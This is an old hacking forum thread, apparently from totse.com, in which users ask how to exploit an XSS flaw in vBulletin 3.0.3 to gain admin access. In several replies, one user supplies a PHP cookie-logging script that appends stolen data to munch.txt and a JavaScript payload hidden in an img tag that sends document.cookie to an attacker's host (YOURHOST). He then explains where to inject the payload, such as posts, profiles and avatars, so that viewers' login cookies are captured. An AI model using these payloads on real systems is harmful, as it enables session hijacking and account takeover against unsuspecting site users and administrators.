About
Community
Bad Ideas
Drugs
Ego
Erotica
Fringe
Society
Technology
register | bbs | search | rss | faq | about
meet up | add to del.icio.us | digg it
Go Back   Community > Technology > Network (in)Security
FAQ Members List Calendar Search Today's Posts Mark Forums Read

Network (in)Security Interesting hacks and cracks. Info on firewalls, TCP/IP, encryption, networks, and security. The ins and outs of the phone system, caller services, how things work, what's illegal and what's not, cellular phones, beepers, telephony legislation, the PUC, ISDN, taps, who's listening, and switches. Talking about phones, hacking systems, technical advice, and such is completely LEGAL in the United States -- it's covered by the First Amendment. What's illegal is conspiracy to commit a crime. So if you say something like "Meet me at 2am so we can crack a can" or "I changed my cell phone's number myself" you are criminally liable. Stating "You can crack a can by doing thus-and-so" or "If you wanted to change a cell phone's number, you could do it like so" is perfectly OK. Posting passwords, calling card numbers, or credit card numbers is forbidden on this network. Posting such info will get you booted off the net.

Reply
 
Thread Tools Display Modes
 #1 
Old 2004-12-20, 05:38
Regular
 
Melbourne Vic Australia
Default executing XSS vulns in vBulletin 3.0.3

I found what looks like a great exploit on bugtraq:

http://marc.theaimsgroup.com/?l=bugtraq&m=107945556112453&w=2

It talks about xss attacks, it gives you poc codes, however i'm not familar with what a constructed xss code looks like.

I got this info on xss:

An abbreviation of cross-site scripting. XSS is a security breach that takes advantage of dynamically generated Web pages. In an XSS attack, a Web application is sent with a script that activates when it is read by an unsuspecting user’s browser or by an application that has not protected itself against cross-site scripting. Because dynamic Web sites rely on user input, a malicious user can input malicious script into the page by hiding it within legitimate requests. Common exploitations include search engine boxes, online forums and public-accessed blogs. Once XSS has been launched, the attacker can change user settings, hijack accounts, poison cookies with malicious code, expose SSL connections, access restricted sites and even launch false advertisements. The simplest way to avoid XSS is to add code to a Web application that causes the dynamic input to ignore certain command tags.

Scripting tags that take advantage of XSS include <SCRIPT>, <OBJECT>, <APPLET>, <EMBED> and <FORM>. Common languages used for XSS include JavaScript, VBScript, HTML, Perl, C++, ActiveX and Flash.

Cross-site scripting also is referred to as malicious tagging and sometimes abbreviated as CSS, though CSS is more commonly used as an abbreviation for cascading style sheets.

Has anyone got experence with such issues?

Any example codes of how one would gain admin or something simlar?

[This message has been edited by Timby (edited 12-20-2004).]
 #2 
Old 2005-01-03, 05:27
Regular
 
Melbourne Vic Australia
Default Re: executing XSS vulns in vBulletin 3.0.3

no one?
 #3 
Old 2005-01-04, 13:33
cvh cvh is offline
Regular
 
Default Re: executing XSS vulns in vBulletin 3.0.3

You can try to collect cookie's to get the admin passw this way.

create a php script on some site with this code give it a name like script.php

<?

$fh = fopen("munch.txt",'a+');

fputs($fh, "$HTTP_REFERER : : : : : ");

fputs($file, "\n");

fclose($fh);



?>



then create on that site(your host still) an empty text file called "munch.txt"

And last use this code in your exploit (mod this line if needed)

<img src="javascript:void(window.location('http://YOURHOST/script.php?&HTTP_REFERER='+document.cookie))">
 #4 
Old 2005-01-04, 13:39
Regular
 
Melbourne Vic Australia
Default Re: executing XSS vulns in vBulletin 3.0.3

Cheers cvh, I was beginning to think this hacking board had turned into a q and a about sub7.

I'll give that a try, thanks again.
 #5 
Old 2005-01-04, 14:28
cvh cvh is offline
Regular
 
Default Re: executing XSS vulns in vBulletin 3.0.3

No problem just ask if you need to know something.
 #6 
Old 2005-01-04, 21:58
Cybios Cybios is offline
Regular
 
Default Re: executing XSS vulns in vBulletin 3.0.3

Ok I see what they are talking about. Thats cool but where do you put the script with the javascript? I have done it where you put it in an online log then when the admin checks the logs in the web browser the cookie is sent to you and it has been succesful. I was just wondering where the javascript would go?
 #7 
Old 2005-01-05, 17:16
cvh cvh is offline
Regular
 
Default Re: executing XSS vulns in vBulletin 3.0.3

^^ Sometimes you can enter html code when you post for exemple a message on a board, but all the popular boards are patchted (just try some guestbook somebody have programmed (I can give you a tut about guestbook terror if you want it), when you are beable to enter html code you can enter also javascript.

The javascript (in the above xss exemple) is now hidden as a image which isn't shown on the page. Just go to a site on which you are logged in or wich uses cookies (google.com,...) and enter into you browsers adressbar this simple line javascript:window.alert(document.cookie) and press enter, a popup will appear with your login data.

The javascript used for this xss hack passes this cookie info through too a phpscript wich simply writes it to a file.

You can find exploits which tells you where to enter the code used for xss hacks.

Thats why everybody tells you to deactivated javascript (and vbscript) and you will not be vulnerable to xss hacks which uses javascript( or vbscript).
 #8 
Old 2005-01-05, 21:23
Cybios Cybios is offline
Regular
 
Default Re: executing XSS vulns in vBulletin 3.0.3

^ Oh so what you'r saying is it only works on vBulletin with javascript enabled? Because in the link it said that youu enter the XXS in the url. I didn't know this was possible and was wondering if someone could explain it to me.

Oh and BTW... It's "javascript:alert(document.cookie)"
 #9 
Old 2005-01-05, 22:22
cvh cvh is offline
Regular
 
Default Re: executing XSS vulns in vBulletin 3.0.3

No it will work everywhere when there is insufficient checking of user supplied data.

The exploits tells you were webapplications don't check sufficient and are vulnerable to code injection (html = xss, php, perl, asp, cgi, ... = remote command execution, sql injection = if done right -> remote command execution, ...)

Javascript can't be disabled on the webserver it's clientside not serverside, this means the code is executed on your computer and not on the webserver, php, asp, perl ... is serverside and is executed on the webserver and not on your computer. and thats why you can enter javascript in your adressbar, this is still on your computer and not on the webserver.
 #10 
Old 2005-01-05, 22:29
Cybios Cybios is offline
Regular
 
Default Re: executing XSS vulns in vBulletin 3.0.3

Yah I don't know what you mean. Can you give an example of using the exploit in the address bar?
 #11 
Old 2005-01-06, 22:03
cvh cvh is offline
Regular
 
Default Re: executing XSS vulns in vBulletin 3.0.3

javascript:void(window.location('http://YOURHOST/script.php?&HTTP_REFERER='+document.cookie))

and the cookie you have on the site that you have open in your browser (google.com,hotmail.com, ..., will be written to http://YOURHOST/munch.txt.

Javascript is only client side!!! And the part in exploits that refers to editing an url by plcaing some javascript in, when you have have edited the url you have to press GO then will the javascript placed somewhere on the website (thread, avatar, profile, ..., ) and when somebody views that page (avatar, thread, profile) then the javascript will be executed (on the viewers pc (yours))and the cookie will be send with hopefully login data to the PHP script!!!
 #12 
Old 2005-01-06, 22:07
cvh cvh is offline
Regular
 
Default Re: executing XSS vulns in vBulletin 3.0.3

Here is a simple tut about xss http://www.h4ckerx.net/article.php?story=20020927075119197

(search for more, there is lots more about xss.)
 #13 
Old 2005-01-06, 23:43
Cybios Cybios is offline
Regular
 
Default Re: executing XSS vulns in vBulletin 3.0.3

Sweet I totally get it now thanks alot!
 #14 
Old 2005-01-07, 23:41
cvh cvh is offline
Regular
 
Default Re: executing XSS vulns in vBulletin 3.0.3

No problem, just ask if you need to know something. Try to learn more about exploits,

(what buffer overflows are and you will learn the real deal about hacking and why it isn't sub7. Here is a tut I always give its very basic but is sometimes handy for given it as a faq http://clarozamesa.atspace.org/tutorials/16.htm )
 
To the best of our knowledge, the text on this page may be freely reproduced and distributed.
 

totse.com certificate signatures
 
 
About | Community | Bad Ideas | Drugs | Ego | Erotica | Fringe | Society | Technology
Hot Topics